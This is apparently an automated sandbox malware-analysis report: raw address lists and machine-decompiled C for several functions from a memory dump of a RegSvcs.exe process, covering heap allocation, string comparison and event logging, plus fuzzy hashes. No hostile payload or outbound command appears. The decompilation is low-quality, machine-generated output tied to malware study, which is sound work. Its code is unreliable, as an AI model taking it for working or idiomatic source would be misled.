0x00ab79eb
0x00ab79eb
0x00ab79ef
0x00ab79f1
0x00000000
0x00000000
0x00ab79f3
0x00ab79f5
0x00ab79ff
0x00ab79ff
0x00000000
0x00ab79ff
0x00ab79f7
0x00ab79fd
0x00000000
0x00000000
0x00000000
0x00ab79fd
0x00ab7bd5
0x00ab7bd8
0x00000000
0x00000000
0x00ab7ba9
0x00ab7bac
0x00ab7bb0
0x00ab7bb1
0x00ab7bb1
0x00ab7bb6
0x00000000
0x00ab7bb6
0x00ab7aa7
0x00ab7aaa
0x00000000
0x00000000
0x00ab7ab2
0x00ab7ab3
0x00ab7ab5
0x00ab7aec
0x00ab7aef
0x00ab7b25
0x00ab7b28
0x00ab7b62
0x00ab7b64
0x00ab7b8f
0x00ab7b92
0x00ab7b96
0x00ab7b98
0x00000000
0x00000000
0x00ab7b9e
0x00ab7b9f
0x00ab7ba3
0x00000000
0x00ab7ba3
0x00ab7b66
0x00ab7b68
0x00ab7ae2
0x00ab7ae2
0x00000000
0x00ab7ae2
0x00ab7b6e
0x00ab7b72
0x00ab7b75
0x00ab7b81
0x00ab7b85
0x00ab7b87
0x00000000
0x00000000
0x00ab7b31
0x00ab7b34
0x00ab7b3c
0x00ab7b45
0x00ab7b46
0x00ab7b4f
0x00ab7b51
0x00ab7b57
0x00ab7b59
0x00ab7b59
0x00000000
0x00ab7b59
0x00ab7b77
0x00000000
0x00ab7b77
0x00ab7b2a
0x00000000
0x00ab7b2a
0x00ab7af1
0x00ab7af3
0x00000000
0x00000000
0x00ab7afb
0x00ab7afc
0x00ab7afe
0x00000000
0x00000000
0x00ab7b00
0x00ab7b03
0x00000000
0x00000000
0x00ab7b05
0x00ab7b09
0x00ab7b0d
0x00ab7b0f
0x00000000
0x00000000
0x00ab7b18
0x00ab7b1d
0x00000000
0x00ab7b1d
0x00ab7ab7
0x00ab7ab9
0x00000000
0x00000000
0x00ab7abf
0x00ab7ac1
0x00000000
0x00000000
0x00ab7ac3
0x00ab7ac6
0x00000000
0x00000000
0x00ab7ac8
0x00ab7acc
0x00ab7ad0
0x00ab7ad2
0x00000000
0x00000000
0x00ab7adb
0x00000000
0x00ab7adb
0x00ab79d6
0x00ab79d9
0x00ab79dc
0x00ab7a91
0x00ab7a94
0x00000000
0x00ab7a94
0x00ab79e2
0x00000000
0x00ab79e2
0x00ab7a74
0x00ab7a7a
0x00000000
0x00000000
0x00ab7a8a
0x00ab7a21
0x00ab7a21
0x00000000
0x00ab7a21
0x00a4c650
0x00a4c651
0x00a4c656
0x00a4c65c
0x00a4c65d
0x00a4c663
0x00a4c664
0x00a4c66a
0x00a4c66e
0x00ab79c5
0x00ab79c7
0x00000000
0x00ab79c7
0x00a4c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa86d25f0e9ffa39f14f8470e88ef684c4a02158d6a034934e6b055e8ff5d26
Instruction ID: ea873f278293d6b4006e03ba54d8d44b575f37050c727b2a988fff84d51c6f6f
Opcode Fuzzy Hash: 7aa86d25f0e9ffa39f14f8470e88ef684c4a02158d6a034934e6b055e8ff5d26
Instruction Fuzzy Hash: 15817D756082019FCB65CF14C881ABEB7ACEBC4390F25486EED469B242D770ED45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00ADB8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00ADB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0xb37b9c; // 0x0
				_t124 = L00A64620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E00A89800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E00A895B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E00A895D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L00A677F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E00A89910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E00A895D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0xb37b9c; // 0x0
									_t92 = L00A64620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E00A89910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E00A4A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E00ADE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E00ADE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E00A895B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x00adb8d9
0x00adb8e4
0x00000000
0x00adb8e6
0x00adb8f3
0x00adb8f5
0x00adb8f5
0x00adb8f8
0x00adb920
0x00adb924
0x00adb936
0x00adb939
0x00adb93d
0x00adb948
0x00adb9a0
0x00adb9a0
0x00adb9a4
0x00adb9bf
0x00adb9c4
0x00adb9c6
0x00adb9cd
0x00adb9d1
0x00adbad4
0x00adbad8
0x00adbada
0x00adbadc
0x00adbadc
0x00adbadf
0x00adbae0
0x00adbae2
0x00adbae4
0x00adbaec
0x00adbaee
0x00adbaf0
0x00adbaf0
0x00adbaec
0x00adbafb
0x00adbafc
0x00adbafe
0x00adbb01
0x00adbb01
0x00000000
0x00adbb06
0x00adb9d7
0x00adb9db
0x00adb9db
0x00adb9de
0x00adb9de
0x00adb9e4
0x00adb9e7
0x00adb9ea
0x00adb9ec
0x00adb9ef
0x00adb9f3
0x00adba1b
0x00adba1b
0x00adba23
0x00adba24
0x00adba27
0x00adba2a
0x00adba2b
0x00adba2e
0x00adba30
0x00adba37
0x00adba3f
0x00adba9c
0x00adbaa2
0x00adbb13
0x00adbb15
0x00adbaae
0x00adbaae
0x00adbab3
0x00adbab5
0x00adbaba
0x00adbac8
0x00adbac8
0x00adbaba
0x00adbacd
0x00adbacf
0x00000000
0x00adbacf
0x00adbb1a
0x00000000
0x00adbb1c
0x00adbaa7
0x00adbb11
0x00000000
0x00adbb11
0x00adbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x00adba41
0x00adba41
0x00adba41
0x00adba58
0x00adba5d
0x00adba62
0x00000000
0x00000000
0x00adba64
0x00adba67
0x00adba68
0x00adba69
0x00adba6c
0x00adba6f
0x00adba71
0x00adba78
0x00adba80
0x00000000
0x00000000
0x00adba90
0x00adba90
0x00adba97
0x00000000
0x00adba97
0x00adb9f5
0x00adb9f7
0x00adb9f7
0x00adb9fa
0x00adba03
0x00adba07
0x00adba0c
0x00adba10
0x00adba17
0x00000000
0x00adb9f7
0x00adb9a6
0x00adb9a8
0x00adb9af
0x00adb9b3
0x00000000
0x00000000
0x00adb9b9
0x00000000
0x00adb9b9
0x00adb94d
0x00adb98f
0x00adb995
0x00adb999
0x00adb960
0x00adb967
0x00adb968
0x00adb96a
0x00000000
0x00adb96a
0x00adb99b
0x00adb99e
0x00000000
0x00000000
0x00000000
0x00adb99e
0x00adb951
0x00adb954
0x00adb95a
0x00adb95e
0x00adb972
0x00adb979
0x00adb97d
0x00adb97f
0x00adb980
0x00adb982
0x00adb984
0x00000000
0x00adb984
0x00000000
0x00adb926
0x00000000
0x00adb926

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d276f84ad3e954ad4d6f9ed6112587b9994c5b3a3bcac7d97eddc0bebb117ac9
Instruction ID: 6295c50a5371954074caf4f6b72d1d13cbadabf6648d096d4fb06a9b21914783
Opcode Fuzzy Hash: d276f84ad3e954ad4d6f9ed6112587b9994c5b3a3bcac7d97eddc0bebb117ac9
Instruction Fuzzy Hash: 4C711032210701EFD731DF14C941F6AB7B5EB44760F26452AE6568B7A1DB74E940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00AC6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L00A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E00AC6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E00A67D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E00A89AE0();
					_t87 = L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E00AC795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E00AC795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E00AC795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E00AC795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L00A64620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E00AC6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E00AC6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E00AC6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E00AC6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E00A67D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E00A89AE0();
								L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L00A62400( &_v36);
							if(_v24 >= 0) {
								_t87 = L00A62400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L00A62400( &_v52);
							}
							if(_v28 >= 0) {
								return L00A62400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x00ac6dd4
0x00ac6dde
0x00ac6de1
0x00ac6de3
0x00ac6de6
0x00ac6de9
0x00ac6dec
0x00ac6def
0x00ac6df2
0x00ac6df5
0x00ac6dfe
0x00ac6e04
0x00ac6e09
0x00ac6e0d
0x00ac6e18
0x00ac6e1b
0x00ac6e22
0x00ac6e2d
0x00ac6e30
0x00ac6e36
0x00ac6e42
0x00ac6e4d
0x00ac6e50
0x00ac6e55
0x00ac6e5c
0x00ac6e6e
0x00ac6e5e
0x00ac6e67
0x00ac6e67
0x00ac6e73
0x00ac6e74
0x00ac6e77
0x00ac6e7c
0x00ac6e7d
0x00ac6e8e
0x00ac6e93
0x00ac6e9c
0x00ac6ea8
0x00ac6eab
0x00ac6eac
0x00ac6eb3
0x00ac6ecd
0x00ac6edc
0x00ac6ee2
0x00ac6ee5
0x00ac6ef2
0x00ac6efb
0x00ac6f01
0x00ac6f06
0x00ac6f0b
0x00ac6f11
0x00ac6f1a
0x00ac6f22
0x00ac6f26
0x00ac6f26
0x00ac6f33
0x00ac6f41
0x00ac6f44
0x00ac6f47
0x00ac6f54
0x00ac6f65
0x00ac6f77
0x00ac6f7c
0x00ac6f82
0x00ac6f91
0x00ac6f99
0x00ac6fa3
0x00ac6fae
0x00ac6fae
0x00ac6fba
0x00ac6fbb
0x00ac6fbc
0x00ac6fc1
0x00ac6fc2
0x00ac6fd3
0x00ac6fd8
0x00ac6fd8
0x00ac6fdf
0x00ac6fe8
0x00ac6fee
0x00ac6fee
0x00ac6ff5
0x00ac6ffb
0x00ac6ffb
0x00ac7004
0x00000000
0x00ac700a
0x00ac7004
0x00ac6eb3
0x00ac6e9c
0x00ac7015

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: af3679ceca8b3f04ebcb989e46f5f1aa99f37093f8a758cc1fae757abb95071d
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 35716871A00619AFCB10DFA8CA85FEEBBB9FF48704F114169E505EB251DB34AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A72AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A72AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0xb38204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0xb38208; // 0xb38207
				_t8 = _t57 + 0xb38208; // 0xb38207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0xb38450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0xb3821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0xb36d5c; // 0x7f350654
							_t72 =  *0xb36d5c; // 0x7f350654
							_t75 =  *0xb36d5c; // 0x7f350654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0xb36d5c; // 0x7f350654
							_t84 =  *0xb36d5c; // 0x7f350654
							_t87 =  *0xb36d5c; // 0x7f350654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E00A8F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x00a72ae4
0x00a72aec
0x00a72aef
0x00a72af4
0x00a72af7
0x00a72afd
0x00a72b92
0x00a72b92
0x00a72b97
0x00a72b9c
0x00a72b9c
0x00a72b03
0x00a72b06
0x00a72b09
0x00a72b09
0x00a72b0f
0x00a72b15
0x00a72b15
0x00a72b1b
0x00a72b1e
0x00a72b21
0x00a72b26
0x00a72b29
0x00a72b81
0x00a72b84
0x00a72c0e
0x00a72c15
0x00a72c24
0x00a72c24
0x00a72b8a
0x00a72b8a
0x00a72b8a
0x00a72b8a
0x00a72b90
0x00000000
0x00000000
0x00000000
0x00000000
0x00a72b4a
0x00a72b4a
0x00a72b4d
0x00a72b53
0x00000000
0x00000000
0x00a72b55
0x00a72b58
0x00a72bb7
0x00ab5d1b
0x00ab5d37
0x00ab5d47
0x00ab5d53
0x00a72bbd
0x00a72bbd
0x00a72bbd
0x00a72bb7
0x00a72b5d
0x00a72c2f
0x00ab5d5b
0x00ab5d77
0x00ab5d87
0x00ab5d93
0x00a72c35
0x00a72c35
0x00a72c35
0x00a72c2f
0x00a72b65
0x00a72b9f
0x00a72ba2
0x00a72b67
0x00a72b67
0x00a72b69
0x00a72b6b
0x00a72b6e
0x00a72bc9
0x00a72bcc
0x00a72bcf
0x00a72bd4
0x00a72bd6
0x00a72bd6
0x00a72bdb
0x00a72c02
0x00a72c05
0x00a72c07
0x00000000
0x00a72c07
0x00a72be0
0x00a72c00
0x00a72c3f
0x00a72c3f
0x00000000
0x00a72c00
0x00a72be5
0x00a72be7
0x00a72bec
0x00a72bf4
0x00a72bf6
0x00000000
0x00a72bf6
0x00a72b70
0x00a72b76
0x00a72b2b
0x00a72b2b
0x00a72b2d
0x00a72b2f
0x00a72b32
0x00a72b35
0x00a72b3a
0x00000000
0x00a72b40
0x00a72b43
0x00a72b45
0x00a72b47
0x00a72b4a
0x00a72b4d
0x00a72b53
0x00000000
0x00000000
0x00000000
0x00a72b53
0x00a72b78
0x00a72b78
0x00a72b7b
0x00a72b7e
0x00000000
0x00a72b7e
0x00a72b76
0x00a72ba5
0x00a72ba5
0x00a72ba8
0x00a72bad
0x00000000
0x00000000
0x00a72baf
0x00a72baf
0x00a72bc2
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d218dc221986e21a35b3e1e423d65ca764a28f9cd0a05319aebf3b07a7fd0192
Instruction ID: 3415248c9d90851dea36fef3849ad0886576df9d10c5a90d7f9afe76cba7dedd
Opcode Fuzzy Hash: d218dc221986e21a35b3e1e423d65ca764a28f9cd0a05319aebf3b07a7fd0192
Instruction Fuzzy Hash: F0518F76B00115CFCB18DF19CC90ABDB7B1FBD8700726C56AE85A9B325DB30AA51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B0AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E00B0C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E00B0ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E00B0FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E00B0EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E00A67D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E00B01608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E00B11536(0xb38ae4, (_t74 -  *0xb38b04 >> 0x14) + (_t74 -  *0xb38b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L00B0C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E00B0A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E00AECB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
